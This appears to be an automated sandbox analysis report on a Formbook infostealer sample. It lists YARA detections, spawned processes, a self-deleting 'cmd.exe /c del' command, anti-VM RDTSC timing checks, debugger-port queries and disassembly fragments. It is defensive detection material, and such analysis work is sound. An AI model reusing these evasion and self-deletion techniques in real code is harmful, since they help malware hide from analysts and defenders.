          Source: 0O9BJfVJi6fEMoS.exe, 00000000.00000002.695770371.0000000008A00000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemscorrc.dllT vs 0O9BJfVJi6fEMoS.exe
          Source: 0O9BJfVJi6fEMoS.exeBinary or memory string: OriginalFilename vs 0O9BJfVJi6fEMoS.exe
          Source: 0O9BJfVJi6fEMoS.exe, 00000005.00000000.684507893.0000000000312000.00000002.00020000.sdmpBinary or memory string: OriginalFilename5uogbG vs 0O9BJfVJi6fEMoS.exe
          Source: 0O9BJfVJi6fEMoS.exeBinary or memory string: OriginalFilename vs 0O9BJfVJi6fEMoS.exe
          Source: 0O9BJfVJi6fEMoS.exe, 00000006.00000002.730975183.0000000000AA2000.00000002.00020000.sdmpBinary or memory string: OriginalFilename5uogbG vs 0O9BJfVJi6fEMoS.exe
          Source: 0O9BJfVJi6fEMoS.exe, 00000006.00000002.732802577.000000000172F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 0O9BJfVJi6fEMoS.exe
          Source: 0O9BJfVJi6fEMoS.exe, 00000006.00000003.730245049.00000000039AE000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameEXPLORER.EXEj% vs 0O9BJfVJi6fEMoS.exe
          Source: 0O9BJfVJi6fEMoS.exeBinary or memory string: OriginalFilename5uogbG vs 0O9BJfVJi6fEMoS.exe
          Source: 0O9BJfVJi6fEMoS.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 0000000B.00000002.910849108.0000000000970000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.910849108.0000000000970000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.730806558.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.730806558.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.911281407.0000000000FB0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.911281407.0000000000FB0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.732150923.00000000010C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.732150923.00000000010C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.732300917.0000000001110000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.732300917.0000000001110000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.689872337.0000000003CC9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.689872337.0000000003CC9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.911225919.0000000000F80000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.911225919.0000000000F80000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 6.2.0O9BJfVJi6fEMoS.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.2.0O9BJfVJi6fEMoS.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.0O9BJfVJi6fEMoS.exe.3d11730.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.0O9BJfVJi6fEMoS.exe.3d11730.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 6.2.0O9BJfVJi6fEMoS.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.2.0O9BJfVJi6fEMoS.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0O9BJfVJi6fEMoS.exe, 00000000.00000002.696031440.0000000008C80000.00000004.00000001.sdmpBinary or memory string: ^.vBpq
          Source: classification engineClassification label: mal100.troj.evad.winEXE@10/1@12/9
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\0O9BJfVJi6fEMoS.exe.logJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeMutant created: \Sessions\1\BaseNamedObjects\TwFbGi
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6824:120:WilError_01
          Source: unknownProcess created: C:\Windows\SysWOW64\explorer.exe
          Source: 0O9BJfVJi6fEMoS.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: 0O9BJfVJi6fEMoS.exeReversingLabs: Detection: 21%
          Source: unknownProcess created: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exe 'C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exe'
          Source: unknownProcess created: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exe {path}
          Source: unknownProcess created: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exe {path}
          Source: unknownProcess created: C:\Windows\SysWOW64\autofmt.exe C:\Windows\SysWOW64\autofmt.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exe'
          Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeProcess created: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exe {path}Jump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeProcess created: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exe {path}Jump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exe'Jump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: 0O9BJfVJi6fEMoS.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: 0O9BJfVJi6fEMoS.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: explorer.pdbUGP source: 0O9BJfVJi6fEMoS.exe, 00000006.00000002.733414389.00000000032E0000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000007.00000000.705470471.0000000005A00000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: 0O9BJfVJi6fEMoS.exe, 00000006.00000002.732550981.0000000001610000.00000040.00000001.sdmp, explorer.exe, 0000000B.00000002.914570132.000000000512F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: 0O9BJfVJi6fEMoS.exe, explorer.exe
          Source: Binary string: explorer.pdb source: 0O9BJfVJi6fEMoS.exe, 00000006.00000002.733414389.00000000032E0000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000007.00000000.705470471.0000000005A00000.00000002.00000001.sdmp
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 0_2_051E1598 push eax; mov dword ptr [esp], ecx0_2_051E159C
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0040BAA8 push ebp; iretd 6_2_0040BAAA
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0041B3F2 push eax; ret 6_2_0041B3F8
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0041B3FB push eax; ret 6_2_0041B462
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0041C399 push edi; ret 6_2_0041C39B
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0041B3A5 push eax; ret 6_2_0041B3F8
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0041B45C push eax; ret 6_2_0041B462
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_00415554 push cs; iretd 6_2_00415555
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0041CE23 push esp; ret 6_2_0041CF5C
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_00413755 push eax; retf 6_2_00413757
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0168D0D1 push ecx; ret 6_2_0168D0E4
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0508D0D1 push ecx; ret 11_2_0508D0E4
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0097BAA8 push ebp; iretd 11_2_0097BAAA
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0098C399 push edi; ret 11_2_0098C39B
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0098B3A5 push eax; ret 11_2_0098B3F8
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0098B3FB push eax; ret 11_2_0098B462
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0098B3F2 push eax; ret 11_2_0098B3F8
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0098B45C push eax; ret 11_2_0098B462
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_00985554 push cs; iretd 11_2_00985555
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0098CE23 push esp; ret 11_2_0098CF5C
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_00983755 push eax; retf 11_2_00983757
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeRDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeRDTSC instruction interceptor: First address: 000000000040896E second address: 0000000000408974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\explorer.exeRDTSC instruction interceptor: First address: 00000000009785E4 second address: 00000000009785EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\explorer.exeRDTSC instruction interceptor: First address: 000000000097896E second address: 0000000000978974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_004088A0 rdtsc 6_2_004088A0
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exe TID: 7056Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exe TID: 5856Thread sleep time: -45000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\explorer.exe TID: 6188Thread sleep time: -40000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
          Source: explorer.exe, 00000007.00000002.923576890.00000000058C0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000007.00000000.710461036.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000007.00000000.705821818.0000000006650000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000007.00000000.710461036.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000007.00000000.717818953.000000000FC96000.00000004.00000001.sdmpBinary or memory string: _VMware_SATA_CD00#5&
          Source: explorer.exe, 00000007.00000002.920387906.0000000004710000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
          Source: explorer.exe, 00000007.00000002.923576890.00000000058C0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000007.00000000.711037304.000000000A716000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
          Source: explorer.exe, 00000007.00000002.923576890.00000000058C0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000007.00000000.711186736.000000000A784000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
          Source: explorer.exe, 00000007.00000002.923576890.00000000058C0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_004088A0 rdtsc 6_2_004088A0
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_00409B10 LdrLoadDll,6_2_00409B10
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0163C962 mov eax, dword ptr fs:[00000030h]6_2_0163C962
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0163B171 mov eax, dword ptr fs:[00000030h]6_2_0163B171
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0163B171 mov eax, dword ptr fs:[00000030h]6_2_0163B171
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0165B944 mov eax, dword ptr fs:[00000030h]6_2_0165B944
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0165B944 mov eax, dword ptr fs:[00000030h]6_2_0165B944
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01654120 mov eax, dword ptr fs:[00000030h]6_2_01654120
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01654120 mov eax, dword ptr fs:[00000030h]6_2_01654120
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01654120 mov eax, dword ptr fs:[00000030h]6_2_01654120
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01654120 mov eax, dword ptr fs:[00000030h]6_2_01654120
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01654120 mov ecx, dword ptr fs:[00000030h]6_2_01654120
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0166513A mov eax, dword ptr fs:[00000030h]6_2_0166513A
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0166513A mov eax, dword ptr fs:[00000030h]6_2_0166513A
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01639100 mov eax, dword ptr fs:[00000030h]6_2_01639100
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01639100 mov eax, dword ptr fs:[00000030h]6_2_01639100
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01639100 mov eax, dword ptr fs:[00000030h]6_2_01639100
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0163B1E1 mov eax, dword ptr fs:[00000030h]6_2_0163B1E1
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0163B1E1 mov eax, dword ptr fs:[00000030h]6_2_0163B1E1
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0163B1E1 mov eax, dword ptr fs:[00000030h]6_2_0163B1E1
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016C41E8 mov eax, dword ptr fs:[00000030h]6_2_016C41E8
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016661A0 mov eax, dword ptr fs:[00000030h]6_2_016661A0
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016661A0 mov eax, dword ptr fs:[00000030h]6_2_016661A0
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016B69A6 mov eax, dword ptr fs:[00000030h]6_2_016B69A6
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016B51BE mov eax, dword ptr fs:[00000030h]6_2_016B51BE
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016B51BE mov eax, dword ptr fs:[00000030h]6_2_016B51BE
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016B51BE mov eax, dword ptr fs:[00000030h]6_2_016B51BE
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016B51BE mov eax, dword ptr fs:[00000030h]6_2_016B51BE
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0166A185 mov eax, dword ptr fs:[00000030h]6_2_0166A185
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0165C182 mov eax, dword ptr fs:[00000030h]6_2_0165C182
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01662990 mov eax, dword ptr fs:[00000030h]6_2_01662990
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01701074 mov eax, dword ptr fs:[00000030h]6_2_01701074
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016F2073 mov eax, dword ptr fs:[00000030h]6_2_016F2073
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01650050 mov eax, dword ptr fs:[00000030h]6_2_01650050
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01650050 mov eax, dword ptr fs:[00000030h]6_2_01650050
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0166002D mov eax, dword ptr fs:[00000030h]6_2_0166002D
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0166002D mov eax, dword ptr fs:[00000030h]6_2_0166002D
